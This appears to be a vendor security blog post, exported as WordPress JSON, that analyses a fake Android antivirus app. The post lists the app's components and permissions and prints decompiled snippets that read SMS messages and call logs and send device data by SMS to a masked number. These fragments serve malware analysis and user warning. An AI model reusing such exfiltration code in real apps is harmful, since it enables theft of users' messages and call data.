{"id":77820,"date":"2014-02-10T16:47:33","date_gmt":"2014-02-10T11:17:33","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=77820"},"modified":"2014-02-10T16:47:33","modified_gmt":"2014-02-10T11:17:33","slug":"fake-android-antivirus-alert","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/fake-android-antivirus-alert\/","title":{"rendered":"Fake Android Antivirus Alert!"},"content":{"rendered":"<p style=\"text-align: left;\">Apparently, a new malicious application is on the loose that poses as an antivirus software for Android devices. In this post, we give you a quick brief about what this malware is all about.<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/image1.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77821 aligncenter\" alt=\"image1\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/image1.png\" width=\"240\" height=\"432\" \/><\/a><\/p>\n<p>Quick Heal has detected this Android malware as <span style=\"color: #666666;\">Android.Agent.BU.<\/span> Before installation, the application asks the user for administrator rights. It displays two options \u2013 \u2018<b>Cancel<\/b>\u2019 and \u2018<b>Activate<\/b>\u2019 (refer to fig. a). And this is where the catch lies. Even if the user chooses the \u2018Cancel\u2019 option, the application gets installed and takes the administrator rights anyway.<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus2.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77824 aligncenter\" alt=\"android_fake_antivirus\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus2.png\" width=\"240\" height=\"432\" \/><\/a><br \/>\nFig. a<\/p>\n<p>After the fake antivirus gets installed, it provides the user with multiple options for scanning the mobile device (refer to fig. b).<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus1.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77823 aligncenter\" alt=\"android_fake_antivirus1\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus1.png\" width=\"240\" height=\"432\" \/><\/a><br \/>\nFig. b<\/p>\n<p>Choosing any of these options will trigger the application to execute malicious activities in the background. And this might look like a simple virus scan to the user.<\/p>\n<p><span style=\"color: #ff6600; font-size: 16px;\">The malware is designed to perform the following activities in the background<\/span>:<\/p>\n<p><strong>1<\/strong>. Stealing the following information from the compromised phone and sending it to the attacker:<\/p>\n<ul>\n<li>Phone number<\/li>\n<li>Call type<\/li>\n<li>Date of call<\/li>\n<li>Call duration<\/li>\n<li>Call-list<\/li>\n<li>Bot_id<\/li>\n<li>IMEI (International Mobile Station Equipment Identity) number<\/li>\n<\/ul>\n<p><strong>2<\/strong>. Stealing text messages from the device\u2019s Inbox.<\/p>\n<p><strong>3<\/strong>. Erasing user data from the compromised phone and even SD card data.<\/p>\n<p><strong>4<\/strong>. Calling and sending SMSs to premium numbers, without the user\u2019s knowledge.<\/p>\n<p><span style=\"font-size: 15px; color: #006bb2; font-family: verdana; font-weight: bold;\"><span style=\"text-decoration: underline;\">Technically, here&#8217;s how the malware functions<\/span>:<br \/>\n<\/span><strong><\/strong><\/p>\n<p><strong>Activity<\/strong>:<\/p>\n<p>&#8211; com.soft360.iService.MainActivity<\/p>\n<p>&#8211; com.BioTechnology.iClientsService.IncomingCallActivity<\/p>\n<p><strong>Service<\/strong>:<\/p>\n<p>&#8211; com.soft360.iService.AService<\/p>\n<p>&#8211;\u00a0com.soft360.iService.webService<\/p>\n<p><strong>Receiver<\/strong>:<\/p>\n<p>&#8211; com.soft360.iService.Alarm<\/p>\n<p>&#8211; com.soft360.iService.AutoStart<\/p>\n<p>&#8211; com.soft360.web.MyAdmin<\/p>\n<p><strong>Permission<\/strong>:<\/p>\n<p>&#8211; android.permission.READ_PHONE_STATE<\/p>\n<p>&#8211; android.permission.ACCESS_WIFI_STATE<\/p>\n<p>&#8211; android.permission.CHANGE_WIFI_STATE<\/p>\n<p>&#8211; android.permission.READ_PHONE_STATE<\/p>\n<p>&#8211; \u00a0android.permission.CALL_PHONE<\/p>\n<p>&#8211; android.permission.ACCESS_NETWORK_STATE<\/p>\n<p>&#8211; android.permission.CHANGE_NETWORK_STATE<\/p>\n<p>&#8211; android.permission.WRITE_EXTERNAL_STORAGE<\/p>\n<p>&#8211; android.permission.ACCESS_NETWORK_STATE<\/p>\n<p>&#8211; android.permission.INTERNET<\/p>\n<p>&#8211; android.permission.RECEIVE_BOOT_COMPLETED<\/p>\n<p>&#8211; android.permission.WRITE_SMS<\/p>\n<p>&#8211; android.permission.READ_SMS<\/p>\n<p>&#8211; android.permission.RECEIVE_SMS<\/p>\n<p>&#8211; android.permission.SEND_SMS<\/p>\n<p>&#8211; android.permission.RECEIVE_BOOT_COMPLETED<\/p>\n<p>&#8211; android.permission.READ_CONTACTS<\/p>\n<p>&#8211; android.permission.RECORD_AUDIO<\/p>\n<p><strong>Code Snippet:<\/strong><\/p>\n<p>String str1 = &#8220;android.provider.Telephony.SMS_RECEIVED&#8221;;<\/p>\n<p>Intent localIntent1 = new Intent(str1);<\/p>\n<p>MainActivity localMainActivity1 = this;<\/p>\n<p>SmsReciever localSmsReciever = SmsReciever.class;<\/p>\n<p>Intent localIntent2 = localIntent1.setClass(localMainActivity1, localSmsReciever);<\/p>\n<p>sendBroadcast(localIntent1);<\/p>\n<p><strong>In SmsReciever<\/strong><\/p>\n<p><strong>1)\u00a0<\/strong>\u00a0\u00a0 String str2 = localSmsMessage1.getDisplayMessageBody().toString();<\/p>\n<p>str2 contains message received.<\/p>\n<p>String str3 = localSmsMessage1.getOriginatingAddress().trim();<\/p>\n<p>str3 contains message received from the number .<\/p>\n<p><strong>2)<\/strong> The below code snippet finds numbers from the call list of the phone.<\/p>\n<p>if (localsmsParser.isCallList())<\/p>\n<p>{<\/p>\n<p>localdbActions.sent_Call_Details();<\/p>\n<p>continue;\u00a0\u00a0\u00a0\u00a0\u00a0 }<\/p>\n<p><em>Note<\/em>: In the SMSReceiver class it check for &#8220;79********54&#8221; SMS .<\/p>\n<p><strong>3) <\/strong>SMS receiver class calls the dbAction class.<\/p>\n<p>The following methods are present in db action which performs the malware activity.<\/p>\n<p>a) sent_Call_Details():<br \/>\nb) get_sms_list():<br \/>\nc) getIMEI():<br \/>\ne) setCALL(int paramInt)<br \/>\nf) setSMS(int paramInt)<\/p>\n<p><strong>In WebService Root class:<\/strong><\/p>\n<p>1) initDeviceServ() is called from alarm class .<\/p>\n<p>Here it checks if the device has more than one SMS count\u00a0 .<\/p>\n<p>if (this.send_sms_count &gt; 1);<\/p>\n<p>try<\/p>\n<p>{<\/p>\n<p>&#8211;\u00a0 Str1=i am<\/p>\n<p>&#8211; \u00a0localStringBuilder1 =i am (<\/p>\n<p>&#8211; \u00a0Str2=Sim Number<\/p>\n<p>&#8211;\u00a0 localStringBuilder2=Sim Number (<\/p>\n<p>&#8211;\u00a0 Str3=Device Name<\/p>\n<p>&#8211;\u00a0 Str4= Device Name )<\/p>\n<p>&#8211;\u00a0 Str5=phone number (79*******45)<\/p>\n<p>It send all the information to 79*******45.<\/p>\n<p>localSmsManager.sendTextMessage(str5, null, str4, null, null);<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus21.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77826 aligncenter\" alt=\"android_fake_antivirus2\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus21.jpg\" width=\"527\" height=\"402\" \/><\/a><\/p>\n<p><strong>Destination Number:<\/strong><\/p>\n<p>+44********30 is one of the numbers where all the stolen user data is sent.<\/p>\n<p>&lt;string name=&#8221;def_tel_number&#8221;&gt;+44********30&lt;\/string&gt;<\/p>\n<p>Before installing any kind of application on your phone, review its permissions carefully. Equally important is to do a thorough research on the publisher. While it may be difficult for you to tell a genuine application from a fake one, <a href=\"https:\/\/play.google.com\/store\/apps\/details?id=com.quickheal.platform.advance.blue\" target=\"_blank\">Quick Heal Mobile Security<\/a> ensures that only clean software are installed on your phone.<\/p>\n<p><span style=\"color: #808080;\">Blog post acknowledgement:<\/span> <em>Quick Heal Threat Research and Response Team.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Apparently, a new malicious application is on the loose that poses as an antivirus software for Android devices. In this post, we give you a quick brief about what this malware is all about. Quick Heal has detected this Android malware as Android.Agent.BU. Before installation, the application asks the user for administrator rights. It displays [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":77837,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,24,4],"tags":[380,882,883,274,26],"class_list":["post-77820","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-android","category-malware","category-news","tag-android-malware","tag-android-roguware","tag-fake-antivirus","tag-google-play","tag-rogueware"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/77820"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=77820"}],"version-history":[{"count":0,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/77820\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=77820"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=77820"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=77820"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}